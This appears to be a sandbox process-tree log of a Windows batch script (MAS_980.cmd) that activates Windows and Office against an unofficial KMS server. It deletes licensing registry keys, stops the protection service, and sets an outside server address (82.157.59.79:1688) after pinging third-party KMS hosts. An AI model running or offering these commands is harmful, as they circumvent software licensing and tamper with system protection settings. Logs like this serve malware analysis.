C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo "C:\Windows\Temp\MAS_980.cmd" "7⤵PID:2572
-
-
C:\Windows\System32\find.exefind /i "C:\Users\Admin\AppData\Local\Temp"7⤵PID:1412
-
-
C:\Windows\System32\fltMC.exefltmc7⤵PID:3784
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Desktop7⤵PID:2300
-
C:\Windows\System32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Desktop8⤵PID:1520
-
-
-
C:\Windows\System32\mode.commode 76, 307⤵PID:860
-
-
C:\Windows\System32\choice.exechoice /C:12345670 /N7⤵PID:4352
-
-
C:\Windows\System32\mode.commode con cols=100 lines=327⤵PID:2020
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "&{$W=$Host.UI.RawUI.WindowSize;$B=$Host.UI.RawUI.BufferSize;$W.Height=31;$B.Height=300;$Host.UI.RawUI.WindowSize=$W;$Host.UI.RawUI.BufferSize=$B;}"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:4604
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ver7⤵PID:2804
-
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_ComputerSystem get CreationClassName /value7⤵PID:1684
-
-
C:\Windows\System32\find.exefind /i "ComputerSystem"7⤵PID:2376
-
-
C:\Windows\System32\sc.exesc query osppsvc7⤵
- Launches sc.exe
PID:872
-
-
C:\Windows\System32\net.exenet start sppsvc /y7⤵PID:4512
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start sppsvc /y8⤵PID:1016
-
-
-
C:\Windows\System32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and PartialProductKey is not null) get ID /value7⤵PID:2408
-
-
C:\Windows\System32\findstr.exefindstr /i ID7⤵PID:3992
-
-
C:\Windows\System32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where (ApplicationID='0ff1ce15-a989-479d-af46-f275c6370663' and PartialProductKey is not null) get ID /value7⤵PID:4448
-
-
C:\Windows\System32\findstr.exefindstr /i ID7⤵PID:4620
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and PartialProductKey is not null) get ID /value"7⤵PID:4372
-
C:\Windows\System32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and PartialProductKey is not null) get ID /value8⤵PID:4836
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path SoftwareLicensingProduct where ID='4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c' get Description, DiscoveredKeyManagementServiceMachineName, DiscoveredKeyManagementServiceMachinePort, EvaluationEndDate, GracePeriodRemaining, ID, KeyManagementServiceMachine, KeyManagementServicePort, KeyManagementServiceProductKeyID, LicenseStatus, LicenseStatusReason, Name, PartialProductKey, ProductKeyID, VLActivationInterval, VLRenewalInterval, KeyManagementServiceLookupDomain, VLActivationTypeEnabled, DiscoveredKeyManagementServiceMachineIpAddress, ProductKeyChannel /value" | findstr =7⤵PID:4880
-
C:\Windows\System32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where ID='4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c' get Description, DiscoveredKeyManagementServiceMachineName, DiscoveredKeyManagementServiceMachinePort, EvaluationEndDate, GracePeriodRemaining, ID, KeyManagementServiceMachine, KeyManagementServicePort, KeyManagementServiceProductKeyID, LicenseStatus, LicenseStatusReason, Name, PartialProductKey, ProductKeyID, VLActivationInterval, VLRenewalInterval, KeyManagementServiceLookupDomain, VLActivationTypeEnabled, DiscoveredKeyManagementServiceMachineIpAddress, ProductKeyChannel /value8⤵PID:4016
-
-
C:\Windows\System32\findstr.exefindstr =8⤵PID:4676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Windows(R) Operating System, RETAIL channel"7⤵PID:2092
-
-
C:\Windows\System32\findstr.exefindstr /i VOLUME_KMSCLIENT7⤵PID:4136
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Windows(R) Operating System, RETAIL channel"7⤵PID:2488
-
-
C:\Windows\System32\findstr.exefindstr /i TIMEBASED_7⤵PID:1828
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Windows(R) Operating System, RETAIL channel"7⤵PID:4724
-
-
C:\Windows\System32\findstr.exefindstr /i VIRTUAL_MACHINE_ACTIVATION7⤵PID:860
-
-
C:\Windows\System32\cmd.execmd /c exit /b 10740664337⤵PID:4864
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path SoftwareLicensingProduct where (ApplicationID='0ff1ce15-a989-479d-af46-f275c6370663' and PartialProductKey is not null) get ID /value"7⤵PID:816
-
C:\Windows\System32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where (ApplicationID='0ff1ce15-a989-479d-af46-f275c6370663' and PartialProductKey is not null) get ID /value8⤵PID:3512
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path SoftwareLicensingProduct where ID='85dd8b5f-eaa4-4af3-a628-cce9e77c9a03' get Description, DiscoveredKeyManagementServiceMachineName, DiscoveredKeyManagementServiceMachinePort, EvaluationEndDate, GracePeriodRemaining, ID, KeyManagementServiceMachine, KeyManagementServicePort, KeyManagementServiceProductKeyID, LicenseStatus, LicenseStatusReason, Name, PartialProductKey, ProductKeyID, VLActivationInterval, VLRenewalInterval, KeyManagementServiceLookupDomain, VLActivationTypeEnabled, DiscoveredKeyManagementServiceMachineIpAddress, ProductKeyChannel /value" | findstr =7⤵PID:2060
-
C:\Windows\System32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where ID='85dd8b5f-eaa4-4af3-a628-cce9e77c9a03' get Description, DiscoveredKeyManagementServiceMachineName, DiscoveredKeyManagementServiceMachinePort, EvaluationEndDate, GracePeriodRemaining, ID, KeyManagementServiceMachine, KeyManagementServicePort, KeyManagementServiceProductKeyID, LicenseStatus, LicenseStatusReason, Name, PartialProductKey, ProductKeyID, VLActivationInterval, VLRenewalInterval, KeyManagementServiceLookupDomain, VLActivationTypeEnabled, DiscoveredKeyManagementServiceMachineIpAddress, ProductKeyChannel /value8⤵PID:2796
-
-
C:\Windows\System32\findstr.exefindstr =8⤵PID:3464
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Office 19, VOLUME_KMSCLIENT channel"7⤵PID:3880
-
-
C:\Windows\System32\findstr.exefindstr /i VOLUME_KMSCLIENT7⤵PID:2572
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Office 19, VOLUME_KMSCLIENT channel"7⤵PID:2020
-
-
C:\Windows\System32\findstr.exefindstr /i TIMEBASED_7⤵PID:1248
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Office 19, VOLUME_KMSCLIENT channel"7⤵PID:1520
-
-
C:\Windows\System32\findstr.exefindstr /i VIRTUAL_MACHINE_ACTIVATION7⤵PID:4620
-
-
C:\Windows\System32\cmd.execmd /c exit /b 10740654727⤵PID:3820
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell "$([DateTime]::Now.addMinutes(127095)).ToString('yyyy-MM-dd HH:mm:ss')" 2>nul7⤵PID:4836
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "$([DateTime]::Now.addMinutes(127095)).ToString('yyyy-MM-dd HH:mm:ss')"8⤵
- Suspicious behavior: EnumeratesProcesses
PID:768
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path SoftwareLicensingService get ClientMachineID, KeyManagementServiceHostCaching /value" | findstr =7⤵PID:1040
-
C:\Windows\System32\Wbem\WMIC.exewmic path SoftwareLicensingService get ClientMachineID, KeyManagementServiceHostCaching /value8⤵PID:3548
-
-
C:\Windows\System32\findstr.exefindstr =8⤵PID:1992
-
-
-
C:\Windows\System32\mode.commode 76, 307⤵PID:4916
-
-
C:\Windows\System32\choice.exechoice /C:12345670 /N7⤵PID:816
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ver7⤵PID:2272
-
-
C:\Windows\System32\reg.exereg query "HKCU\Console" /v ForceV27⤵PID:4880
-
-
C:\Windows\System32\find.exefind /i "0x0"7⤵PID:1812
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c echo prompt $E | cmd7⤵PID:2496
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo prompt $E "8⤵PID:4016
-
-
C:\Windows\System32\cmd.execmd8⤵PID:3668
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE7⤵PID:5084
-
C:\Windows\System32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE8⤵PID:2868
-
-
-
C:\Windows\System32\wbem\WMIC.exewmic path Win32_ComputerSystem get CreationClassName /value7⤵PID:1572
-
-
C:\Windows\System32\find.exefind /i "ComputerSystem"7⤵PID:1936
-
-
C:\Windows\System32\reg.exereg query "HKCU\SOFTWARE\Microsoft\Windows Script Host\Settings" /v Enabled7⤵PID:2804
-
-
C:\Windows\System32\find.exefind /i "0x0"7⤵PID:1828
-
-
C:\Windows\System32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings" /v Enabled7⤵PID:884
-
-
C:\Windows\System32\find.exefind /i "0x0"7⤵PID:2096
-
-
C:\Windows\System32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext /v MigrationToV5Done7⤵
- Modifies registry key
PID:3516
-
-
C:\Windows\System32\find.exefind /i "0x1"7⤵PID:4076
-
-
C:\Windows\System32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext7⤵
- Modifies registry key
PID:1760
-
-
C:\Windows\System32\findstr.exefindstr /i /r ".*retail"7⤵PID:4428
-
-
C:\Windows\System32\findstr.exefindstr /i /v "project visio"7⤵PID:2756
-
-
C:\Windows\System32\find.exefind /i "0x2"7⤵PID:1684
-
-
C:\Windows\System32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext7⤵
- Modifies registry key
PID:2256
-
-
C:\Windows\System32\findstr.exefindstr /i /r ".*retail"7⤵PID:4664
-
-
C:\Windows\System32\find.exefind /i "0x3"7⤵PID:4916
-
-
C:\Windows\System32\findstr.exefindstr /i /v "project visio"7⤵PID:3512
-
-
C:\Windows\System32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext7⤵
- Modifies registry key
PID:992
-
-
C:\Windows\System32\findstr.exefindstr /i /r ".*volume"7⤵PID:4928
-
-
C:\Windows\System32\findstr.exefindstr /i /v "project visio"7⤵PID:2792
-
-
C:\Windows\System32\find.exefind /i "0x2"7⤵PID:868
-
-
C:\Windows\System32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext7⤵
- Modifies registry key
PID:2412
-
-
C:\Windows\System32\findstr.exefindstr /i /r ".*volume"7⤵PID:2380
-
-
C:\Windows\System32\findstr.exefindstr /i /v "project visio"7⤵PID:3464
-
-
C:\Windows\System32\find.exefind /i "0x3"7⤵PID:4848
-
-
C:\Windows\System32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext7⤵
- Modifies registry key
PID:3772
-
-
C:\Windows\System32\findstr.exefindstr /i /r "project.*"7⤵PID:1756
-
-
C:\Windows\System32\find.exefind /i "0x2"7⤵PID:888
-
-
C:\Windows\System32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext7⤵
- Modifies registry key
PID:4508
-
-
C:\Windows\System32\findstr.exefindstr /i /r "project.*"7⤵PID:4484
-
-
C:\Windows\System32\find.exefind /i "0x3"7⤵PID:1476
-
-
C:\Windows\System32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext7⤵
- Modifies registry key
PID:872
-
-
C:\Windows\System32\findstr.exefindstr /i /r "visio.*"7⤵PID:4424
-
-
C:\Windows\System32\find.exefind /i "0x2"7⤵PID:556
-
-
C:\Windows\System32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext7⤵
- Modifies registry key
PID:1892
-
-
C:\Windows\System32\findstr.exefindstr /i /r "visio.*"7⤵PID:4496
-
-
C:\Windows\System32\find.exefind /i "0x3"7⤵PID:3748
-
-
C:\Windows\System32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\taskcache\tasks" /f Path /s7⤵PID:3000
-
-
C:\Windows\System32\find.exefind /i "\Activation-Renewal"7⤵PID:2164
-
-
C:\Windows\System32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\taskcache\tasks" /f Path /s7⤵PID:4552
-
-
C:\Windows\System32\findstr.exefindstr /i "\Activation-Renewal \Online_KMS_Activation_Script-Renewal"7⤵PID:1192
-
-
C:\Windows\System32\mode.commode con: cols=76 lines=307⤵PID:740
-
-
C:\Windows\System32\choice.exechoice /C:12345670 /N7⤵PID:2008
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f7⤵PID:4448
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sppsvc.exe" /f7⤵PID:3904
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f7⤵PID:1808
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName7⤵PID:1504
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort7⤵PID:8
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v DisableDnsPublishing7⤵PID:4812
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v DisableKeyManagementServiceHostCaching7⤵PID:1664
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f" /f7⤵PID:816
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /reg:327⤵PID:2272
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /reg:327⤵PID:4676
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f /reg:327⤵PID:1812
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f7⤵PID:4016
-
-
C:\Windows\System32\reg.exereg delete "HKU\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f" /f7⤵PID:2960
-
-
C:\Windows\System32\reg.exereg delete "HKU\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f7⤵
- Modifies data under HKEY_USERS
PID:2496
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform" /f /v KeyManagementServiceName7⤵PID:1396
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform" /f /v KeyManagementServicePort7⤵PID:5084
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform" /f /v DisableDnsPublishing7⤵PID:2600
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform" /f /v DisableKeyManagementServiceHostCaching7⤵PID:860
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\59a52881-a989-479d-af46-f275c6370663" /f7⤵PID:4836
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f7⤵PID:1040
-
-
C:\Windows\System32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f"7⤵PID:2168
-
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_ComputerSystem get CreationClassName /value7⤵PID:1096
-
-
C:\Windows\System32\find.exefind /i "ComputerSystem"7⤵PID:2372
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Desktop7⤵PID:3516
-
C:\Windows\System32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Desktop8⤵PID:2376
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ver7⤵PID:2260
-
-
C:\Windows\System32\mode.commode con cols=98 lines=317⤵PID:1336
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "&{$W=$Host.UI.RawUI.WindowSize;$B=$Host.UI.RawUI.BufferSize;$W.Height=31;$B.Height=300;$Host.UI.RawUI.WindowSize=$W;$Host.UI.RawUI.BufferSize=$B;}"7⤵PID:1760
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ping -n 1 kms.zhuxiaole.org7⤵PID:4956
-
C:\Windows\System32\PING.EXEping -n 1 kms.zhuxiaole.org8⤵
- Runs ping.exe
PID:2332
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ping -4 -n 1 kms.itsjzx.com 2>nul7⤵PID:1196
-
C:\Windows\System32\PING.EXEping -4 -n 1 kms.itsjzx.com8⤵
- Runs ping.exe
PID:1120
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir /b /ad C:\Windows\System32\spp\tokens\skus7⤵PID:3408
-
-
C:\Windows\System32\sc.exesc query osppsvc7⤵
- Launches sc.exe
PID:3992
-
-
C:\Windows\System32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sppsvc.exe"7⤵PID:3772
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\CurrentVersion\Software Protection Platform" /v NoGenTicket /t REG_DWORD /d 1 /f7⤵PID:1724
-
-
C:\Windows\System32\sc.exesc query sppsvc7⤵
- Launches sc.exe
PID:3656
-
-
C:\Windows\System32\find.exefind /i "STOPPED"7⤵PID:4488
-
-
C:\Windows\System32\net.exenet stop sppsvc /y7⤵PID:4544
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sppsvc /y8⤵PID:1788
-
-
-
C:\Windows\System32\sc.exesc query sppsvc7⤵
- Launches sc.exe
PID:716
-
-
C:\Windows\System32\find.exefind /i "STOPPED"7⤵PID:3932
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform" /f /v KeyManagementServiceName /t REG_SZ /d "82.157.59.79"7⤵PID:1668
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform" /f /v KeyManagementServicePort /t REG_SZ /d "1688"7⤵PID:1892
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c REG QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages" /f "Microsoft-Windows-*Edition~31bf3856ad364e35" /k 2>nul | FIND /I "CurrentVersion"7⤵PID:4944
-
C:\Windows\System32\reg.exeREG QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages" /f "Microsoft-Windows-*Edition~31bf3856ad364e35" /k8⤵PID:3000
-
-
C:\Windows\System32\find.exeFIND /I "CurrentVersion"8⤵PID:4992
-
-
-
C:\Windows\System32\reg.exeREG QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Microsoft-Windows-ProfessionalEdition~31bf3856ad364e35~amd64~~10.0.19041.1288" /v "CurrentState"7⤵PID:4552
-
-
C:\Windows\System32\find.exeFIND /I "0x70"7⤵PID:3240
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ECHO Microsoft-Windows-ProfessionalEdition~31bf3856ad364e35~amd64~~10.0.19041.12887⤵PID:576
-
-
C:\Windows\System32\reg.exeREG QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Microsoft-Windows-ProfessionalEdition~31bf3856ad364e35~amd64~~10.0.19041.264" /v "CurrentState"7⤵PID:3724
-
-
C:\Windows\System32\find.exeFIND /I "0x70"7⤵PID:4128
-
-
C:\Windows\System32\net.exenet start sppsvc /y7⤵PID:3692
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start sppsvc /y8⤵PID:4048
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' AND PartialProductKey is not NULL) get LicenseFamily /value" 2>nul7⤵PID:984
-
C:\Windows\System32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' AND PartialProductKey is not NULL) get LicenseFamily /value8⤵PID:2024
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName 2>nul7⤵PID:1320
-
C:\Windows\System32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName8⤵PID:1864
-
-
-
C:\Windows\System32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath7⤵
- Modifies registry key
PID:436
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath" 2>nul7⤵PID:3872
-
C:\Windows\System32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath8⤵
- Modifies registry key
PID:3636
-
-
-
C:\Windows\System32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds7⤵
- Modifies registry key
PID:4896
-
-
C:\Windows\System32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\15.0\ClickToRun /v InstallPath7⤵
- Modifies registry key
PID:1312
-
-
C:\Windows\System32\reg.exereg query HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\14.0\CVH /f Click2run /k7⤵
- Modifies registry key
PID:3348
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\14.0\Common\InstallRoot /v Path" 2>nul7⤵PID:5040
-
C:\Windows\System32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\14.0\Common\InstallRoot /v Path8⤵
- Modifies registry key
PID:1360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\14.0\Common\InstallRoot /v Path" 2>nul7⤵PID:2444
-
C:\Windows\System32\reg.exereg query HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\14.0\Common\InstallRoot /v Path8⤵
- Modifies registry key
PID:4816
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\15.0\Common\InstallRoot /v Path" 2>nul7⤵PID:2160
-
C:\Windows\System32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\15.0\Common\InstallRoot /v Path8⤵
- Modifies registry key
PID:3048
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\15.0\Common\InstallRoot /v Path" 2>nul7⤵PID:2832
-
C:\Windows\System32\reg.exereg query HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\15.0\Common\InstallRoot /v Path8⤵
- Modifies registry key
PID:4136
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\16.0\Common\InstallRoot /v Path" 2>nul7⤵PID:4880
-
C:\Windows\System32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\16.0\Common\InstallRoot /v Path8⤵
- Modifies registry key
PID:1856
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\16.0\Common\InstallRoot /v Path" 2>nul7⤵PID:2696
-
C:\Windows\System32\reg.exereg query HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\16.0\Common\InstallRoot /v Path8⤵
- Modifies registry key
PID:3528
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds7⤵PID:4628
-
C:\Windows\System32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds8⤵
- Modifies registry key
PID:4336
-
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"MondoVolume" "C:\Windows\Temp\c2rchk.txt"7⤵PID:5084
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"ProPlusVolume" "C:\Windows\Temp\c2rchk.txt"7⤵PID:2600
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"ProjectProVolume" "C:\Windows\Temp\c2rchk.txt"7⤵PID:4808
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"VisioProVolume" "C:\Windows\Temp\c2rchk.txt"7⤵PID:1992
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"StandardVolume" "C:\Windows\Temp\c2rchk.txt"7⤵PID:1828
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"ProjectStdVolume" "C:\Windows\Temp\c2rchk.txt"7⤵PID:3192
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"VisioStdVolume" "C:\Windows\Temp\c2rchk.txt"7⤵PID:4412
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"AccessVolume" "C:\Windows\Temp\c2rchk.txt"7⤵PID:2096
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"SkypeforBusinessVolume" "C:\Windows\Temp\c2rchk.txt"7⤵PID:2372
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"OneNoteVolume" "C:\Windows\Temp\c2rchk.txt"7⤵PID:380
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"ExcelVolume" "C:\Windows\Temp\c2rchk.txt"7⤵PID:2376
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"OutlookVolume" "C:\Windows\Temp\c2rchk.txt"7⤵PID:2260
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"PowerPointVolume" "C:\Windows\Temp\c2rchk.txt"7⤵PID:1336
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"PublisherVolume" "C:\Windows\Temp\c2rchk.txt"7⤵PID:4752
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"WordVolume" "C:\Windows\Temp\c2rchk.txt"7⤵PID:4768
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"ProjectProXVolume" "C:\Windows\Temp\c2rchk.txt"7⤵PID:2240
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"ProjectStdXVolume" "C:\Windows\Temp\c2rchk.txt"7⤵PID:1684
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"VisioProXVolume" "C:\Windows\Temp\c2rchk.txt"7⤵PID:4664
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"VisioStdXVolume" "C:\Windows\Temp\c2rchk.txt"7⤵PID:1760
-
-
C:\Windows\System32\findstr.exefindstr /I /C:"MondoRetail" "C:\Windows\Temp\c2rchk.txt"7⤵PID:2684
-
-
